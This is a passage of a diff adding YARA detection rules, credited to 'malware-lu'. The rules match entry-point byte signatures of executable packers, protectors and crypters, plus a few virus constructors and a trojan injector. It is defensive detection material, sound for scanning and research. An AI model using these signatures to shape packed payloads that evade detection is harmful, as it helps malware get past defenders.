+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 53 8B D8 33 C0 A3 09 09 09 00 6A 00 E8 09 09 00 FF A3 09 09 09 00 A1 09 09 09 00 A3 09 09 09 00 33 C0 A3 09 09 09 00 33 C0 A3 09 09 09 00 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV12ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 77 1E 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PEProtect09Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 51 55 57 64 67 A1 30 00 85 C0 78 0D E8 07 00 00 00 58 83 C0 07 C6 90 C3 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPack32v1x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 55 8B E8 33 DB EB 60 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ChSfxsmallv11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? E8 ?? ?? 8B EC 83 EC ?? 8C C8 BB ?? ?? B1 ?? D3 EB 03 C3 8E D8 05 ?? ?? 89 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXModifiedStubcFarbrauschConsumerConsulting
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02NorthStarPEShrinker13Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv098tE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 25 E4 FF FF 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualBasicMASM32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 09 94 0F B7 FF 68 80 ?? ?? 00 81 F6 8E 00 00 00 5B EB 02 11 C2 8D 05 F4 00 00 00 47 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv022v023BetaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 07 BE 88 01 40 00 AD 8B F8 59 95 F3 A5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxVirusConstructorbased
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB ?? ?? B9 ?? ?? 2E ?? ?? ?? ?? 43 43 ?? ?? 8B EC CC 8B ?? ?? 81 ?? ?? ?? 06 1E B8 ?? ?? CD 21 3D ?? ?? ?? ?? 8C D8 48 8E D8 }
+	$a1 = { E8 ?? ?? 5D 81 ?? ?? ?? 06 1E E8 ?? ?? E8 ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? ?? B4 4A BB FF FF CD 21 83 ?? ?? B4 4A CD 21 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PESHiELD02
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 41 4E 41 4B 49 4E 5D 83 ED 06 EB 02 EA 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02Gleam100Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 0C 53 56 57 E8 24 02 00 FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DBPEv233DingBoy
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 20 ?? ?? 40 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 9C 6A 10 73 0B EB 02 C1 51 E8 06 ?? ?? ?? C4 11 73 F7 5B CD 83 C4 04 EB 02 99 EB FF 0C 24 71 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PEtite2xlevel0Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EPack14litefinalby6aHguT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 8B C0 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElock098tE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 25 E4 FF FF 00 00 00 ?? ?? ?? ?? 1E ?? ?? 00 00 00 00 00 00 00 00 00 3E ?? ?? 00 2E ?? ?? 00 26 ?? ?? 00 00 00 00 00 00 00 00 00 4B ?? ?? 00 36 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 ?? ?? 00 00 00 00 00 69 ?? ?? 00 00 00 00 00 56 ?? ?? 00 00 00 00 00 69 ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 75 73 65 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnnamedScrambler10p0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC 53 56 33 C0 89 45 ?? ?? ?? ?? 40 00 E8 11 F4 FF FF BE 30 6B 40 00 33 C0 55 68 C9 42 40 00 64 FF 30 64 89 20 E8 C9 FA FF FF BA D8 42 40 00 8B ?? ?? ?? ?? FF FF 8B D8 B8 28 6B 40 00 8B 16 E8 37 F0 FF FF B8 2C 6B 40 00 8B 16 E8 2B F0 FF FF B8 28 6B 40 00 E8 19 F0 FF FF 8B D0 8B C3 8B 0E E8 42 E3 FF FF BA DC 42 40 00 8B C6 E8 2A FA FF FF 8B D8 B8 20 6B 40 00 8B 16 E8 FC EF FF FF B8 24 6B 40 00 8B 16 E8 F0 EF FF FF B8 20 6B 40 00 E8 DE EF FF FF 8B D0 8B C3 8B 0E E8 07 E3 FF FF 6A 00 6A 19 6A 00 6A 32 A1 28 6B 40 00 E8 59 EF FF FF 83 E8 05 03 C0 8D 55 EC E8 94 FE FF FF 8B 55 EC B9 24 6B 40 00 A1 20 6B 40 00 E8 E2 F6 FF FF 6A 00 6A 19 6A 00 6A 32 }
+
+condition:
+		$a0
+}
+	
+	
+rule WARNINGTROJANADinjector
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 61 BE 00 20 44 00 8D BE 00 F0 FB FF C7 87 9C E0 04 00 6A F0 8A 5E 57 83 CD FF EB 0E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule TopSpeedv3011989
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E BA ?? ?? 8E DA 8B ?? ?? ?? 8B ?? ?? ?? FF ?? ?? ?? 50 53 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CodeCryptv0164
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 2E 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F EB 03 FF 1D 34 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXHiT001DJSiba
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01ASProtectAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PocketPCARM
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F0 40 2D E9 00 40 A0 E1 01 50 A0 E1 02 60 A0 E1 03 70 A0 E1 ?? 00 00 EB 07 30 A0 E1 06 20 A0 E1 05 10 A0 E1 04 00 A0 E1 ?? ?? ?? EB F0 40 BD E8 ?? 00 00 EA ?? 40 2D E9 ?? ?? 9F E5 ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 9F E5 00 ?? ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AnskyaBinderv11Anskya
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? ?? 00 BB F8 11 40 00 33 ED 83 EE 04 39 2E 74 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtectorV10Bvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 CA 37 41 00 68 06 38 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SecurePE1Xwwwdeepzoneorg
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 04 24 E8 00 00 00 00 5D 81 ED 4C 2F 40 00 89 85 61 2F 40 00 8D 9D 65 2F 40 00 53 C3 00 00 00 00 8D B5 BA 2F 40 00 8B FE BB 65 2F 40 00 B9 C6 01 00 00 AD 2B C3 C1 C0 03 33 C3 AB 43 81 FB 8E 2F 40 00 75 05 BB 65 2F 40 00 E2 E7 89 AD 1A 31 40 00 89 AD 55 34 40 00 89 AD 68 34 40 00 8D 85 BA 2F 40 00 50 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yPv10bbyAshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 4C 32 40 00 E8 03 00 00 00 EB 01 ?? B9 EA 47 40 00 81 E9 E9 32 40 00 8B D5 81 C2 E9 32 40 00 8D 3A 8B F7 33 C0 E8 04 00 00 00 90 EB 01 C2 E8 03 00 00 00 EB 01 ?? AC ?? ?? ?? ?? ?? ?? ?? EB 01 E8 }
+
+condition:
+		$a0
+}
+	
+	
+rule MSLRHv031a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 D1 CB 0F CA C1 CA E0 D1 CA 0F C8 EB 01 F1 0F C0 C9 D2 D1 0F C1 C0 D3 DA C0 D6 A8 EB 01 DE D0 EC 0F C1 CB D0 CF 0F C1 D1 D2 DB 0F C8 EB 01 BC C0 E9 C6 C1 D0 91 0F CB EB 01 73 0F CA 87 D9 87 D2 D0 CF 87 D9 0F C8 EB 01 C1 EB 01 A2 86 CA D0 E1 0F C0 CB 0F }
+	$a1 = { 60 D1 CB 0F CA C1 CA E0 D1 CA 0F C8 EB 01 F1 0F C0 C9 D2 D1 0F C1 C0 D3 DA C0 D6 A8 EB 01 DE D0 EC 0F C1 CB D0 CF 0F C1 D1 D2 DB 0F C8 EB 01 BC C0 E9 C6 C1 D0 91 0F CB EB 01 73 0F CA 87 D9 87 D2 D0 CF 87 D9 0F C8 EB 01 C1 EB 01 A2 86 CA D0 E1 0F C0 CB 0F CA C0 C7 91 0F CB C1 D9 0C 86 F9 86 D7 D1 D9 EB 01 A5 EB 01 11 EB 01 1D 0F C1 C2 0F CB 0F C1 C2 EB 01 A1 C0 E9 FD 0F C1 D1 EB 01 E3 0F CA 87 D9 EB 01 F3 0F CB 87 C2 0F C0 F9 D0 F7 EB 01 2F 0F C9 C0 DC C4 EB 01 35 0F CA D3 D1 86 C8 EB 01 01 0F C0 F5 87 C8 D0 DE EB 01 95 EB 01 E1 EB 01 FD EB 01 EC 87 D3 0F CB C1 DB 35 D3 E2 0F C8 86 E2 86 EC C1 FB 12 D2 EE 0F C9 D2 F6 0F CA 87 C3 C1 D3 B3 EB 01 BF D1 CB 87 C9 0F CA 0F C1 DB EB 01 44 C0 CA F2 0F C1 D1 0F CB EB 01 D3 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule Upackv039finalDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 56 10 E2 E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91 }
+	$a1 = { FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule vprotector12vcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00 EB 12 FF 9C 74 03 75 01 E9 81 0C 24 00 01 00 00 9D 90 EB F4 64 89 25 00 }
+	$a1 = { EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00 EB 12 FF 9C 74 03 75 01 E9 81 0C 24 00 01 00 00 9D 90 EB F4 64 89 25 00 00 00 00 EB E6 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 33 F6 E8 10 00 00 00 8B 64 24 08 64 8F 05 00 00 00 00 58 EB 13 C7 83 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 AD CD 20 E8 05 00 00 00 0F 01 EB 05 E8 EB FB 00 00 83 C4 04 E8 08 00 00 00 0F 01 83 C0 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule FakeNinjav28Spirit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? ?? ?? FF E2 64 11 40 00 FF 35 84 11 40 00 E8 40 }
+
+condition:
+		$a0
+}
+	
+	
+rule PECompactv133
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A6 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 00 80 40 ?? 90 90 01 85 9E 80 40 ?? BB E8 0E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DragonArmorOrient
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF 4C ?? ?? 00 83 C9 FF 33 C0 68 34 ?? ?? 00 F2 AE F7 D1 49 51 68 4C ?? ?? 00 E8 11 0A 00 00 83 C4 0C 68 4C ?? ?? 00 FF 15 00 ?? ?? 00 8B F0 BF 4C ?? ?? 00 83 C9 FF 33 C0 F2 AE F7 D1 49 BF 4C ?? ?? 00 8B D1 68 34 ?? ?? 00 C1 E9 02 F3 AB 8B CA 83 E1 03 F3 AA BF 5C ?? ?? 00 83 C9 FF 33 C0 F2 AE F7 D1 49 51 68 5C ?? ?? 00 E8 C0 09 00 00 8B 1D 04 ?? ?? 00 83 C4 0C 68 5C ?? ?? 00 56 FF D3 A3 D4 ?? ?? 00 BF 5C ?? ?? 00 83 C9 FF 33 C0 F2 AE F7 D1 49 BF 5C ?? ?? 00 8B D1 68 34 ?? ?? 00 C1 E9 02 F3 AB 8B CA 83 E1 }
+
+condition:
+		$a0
+}
+	
+	
+rule ThemidaWinLicenseV1802OreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftDefender1xRandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44 CD 00 59 9C 50 74 0A 75 08 E8 59 C2 04 00 55 8B EC E8 F4 FF FF FF 56 57 53 78 0F 79 0D E8 34 99 47 49 34 33 EF 31 34 52 47 23 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 E6 01 00 00 03 C8 74 BD 75 BB E8 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PellesC2x4xDLLPelleOrinius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 56 57 8B 5D 0C 8B 75 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPX290LZMADelphistubMarkusOberhumerLaszloMolnarJohnReiser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV119aPlib043ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 3C 04 00 00 EB 0C 8B 85 38 04 00 00 89 85 3C 04 00 00 8D B5 60 04 00 00 8D 9D EB 02 00 00 33 FF E8 52 01 00 00 EB 1B 8B 85 3C 04 00 00 FF 74 37 04 01 04 24 FF 34 37 01 04 24 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 DF 83 BD 48 04 00 00 00 74 0E 83 BD 4C 04 00 00 00 74 05 E8 B8 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 D1 03 00 00 89 85 5C 04 00 00 5B FF B5 5C 04 00 00 56 FF D3 83 C4 08 8B B5 5C 04 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 E9 94 00 00 00 56 FF 95 C9 03 00 00 85 C0 0F 84 B4 00 00 00 89 85 54 04 00 00 8B C6 EB 5B 8B 85 58 04 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 58 04 00 00 C7 00 20 20 20 00 EB 06 FF B5 58 04 00 00 FF B5 54 04 00 00 FF 95 CD 03 00 00 85 C0 74 71 89 07 83 C7 04 8B 85 58 04 00 00 EB 01 40 80 38 00 75 FA 40 89 85 58 04 00 00 66 81 78 02 00 80 74 A5 80 38 00 75 A0 EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 80 3E 01 0F 85 63 FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 5C 04 00 00 FF 95 D5 03 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VirogensPEShrinkerv014
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 55 E8 ?? ?? ?? ?? 87 D5 5D 60 87 D5 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 57 56 AD 0B C0 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtBorlandDelphiBorlandC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 }
+	$a1 = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80 }
+	$a2 = { EB 01 2E EB 02 A5 55 BB 80 ?? ?? 00 87 FE 8D 05 AA CE E0 63 EB 01 75 BA 5E CE E0 63 EB 02 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01ACProtect109Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 02 00 00 90 90 90 04 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorV16dVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 90 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 B8 ?? ?? ?? ?? 90 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv032BetaPatchDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 ?? ?? AD 50 ?? AD 91 F3 A5 }
+
+condition:
+		$a0
+}
+	
+	
+rule Apex30alpha500mhz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5F B9 14 00 00 00 51 BE 00 10 40 00 B9 00 ?? ?? 00 8A 07 30 06 46 E2 FB 47 59 E2 EA 68 ?? ?? ?? 00 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule SimbiOZPoly21Extranger
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 50 8B C4 83 C0 04 C7 00 ?? ?? ?? ?? 58 C3 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov184
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 E8 C1 40 00 68 F4 86 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov183
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 E0 C1 40 00 68 64 84 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov182
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 E0 C1 40 00 68 74 81 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov180
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 E8 C1 00 00 68 F4 86 00 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeSplitter13SplitMethodBillPrisonerTPOC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5D 81 ED 08 12 40 00 E8 66 FE FF FF 55 50 8D 9D 81 11 40 00 53 8D 9D 21 11 40 00 53 6A 08 E8 76 FF FF FF 6A 40 68 00 30 00 00 68 00 01 00 00 6A 00 FF 95 89 11 40 00 89 85 61 10 40 00 50 68 00 01 00 00 FF 95 85 11 40 00 8D 85 65 10 40 00 50 FF B5 61 10 40 00 FF 95 8D 11 40 00 6A 00 68 80 00 00 00 6A 02 6A 00 ?? ?? ?? ?? 01 1F 00 FF B5 61 10 40 00 FF 95 91 11 40 00 89 85 72 10 40 00 6A 00 8D ?? ?? ?? ?? 00 50 FF B5 09 10 40 00 8D 85 F5 12 40 00 50 FF B5 72 10 40 00 FF 95 95 11 40 00 FF B5 72 10 40 00 FF 95 99 11 40 00 8D 85 0D 10 40 00 50 8D 85 1D 10 40 00 50 B9 07 00 00 00 6A 00 E2 FC }
+	$a1 = { E9 FE 01 00 00 ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 73 76 63 45 72 30 31 31 2E 74 6D 70 00 00 00 00 00 00 00 00 00 64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 85 C0 0F 84 5F 02 00 00 8B 48 30 80 39 6B 74 07 80 39 4B 74 02 EB E7 80 79 0C 33 74 02 EB DF 8B 40 18 C3 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule RJoiner12aVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 0C 01 00 00 8D 85 F4 FE FF FF 56 50 68 04 01 00 00 FF 15 0C 10 40 00 94 90 94 8D 85 F4 FE FF FF 50 FF 15 08 10 40 00 94 90 94 BE 00 20 40 00 94 90 94 83 3E FF 74 7D 53 57 33 DB 8D 7E 04 94 90 94 53 68 80 00 00 00 6A 02 53 6A 01 68 00 00 00 C0 57 FF 15 04 10 40 00 89 45 F8 94 90 94 8B 06 8D 74 06 04 94 90 94 8D 45 FC 53 50 8D 46 04 FF 36 50 FF 75 F8 FF 15 00 10 40 00 94 90 94 FF 75 F8 FF 15 10 10 40 00 94 90 94 8D 85 F4 FE FF FF 6A 0A 50 53 57 68 20 10 40 00 53 FF 15 18 10 40 00 94 90 94 8B 06 8D 74 06 04 94 90 94 83 3E FF 75 89 5F 5B 33 C0 5E C9 C2 10 00 CC CC 24 11 }
+
+condition:
+		$a0
+}
+	
+	
+rule VxVirusConstructorIVPbased
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? E8 ?? ?? 5D ?? ?? ?? ?? ?? 81 ED ?? ?? ?? ?? ?? ?? E8 ?? ?? 81 FC ?? ?? ?? ?? 8D ?? ?? ?? BF ?? ?? 57 A4 A5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPE12003518WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 79 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv168v184
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 87 DD 8B 85 E6 90 40 01 85 33 90 40 66 C7 85 90 40 90 90 01 85 DA 90 40 01 85 DE 90 40 01 85 E2 90 40 BB 7B 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SDProtectorProEdition116RandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
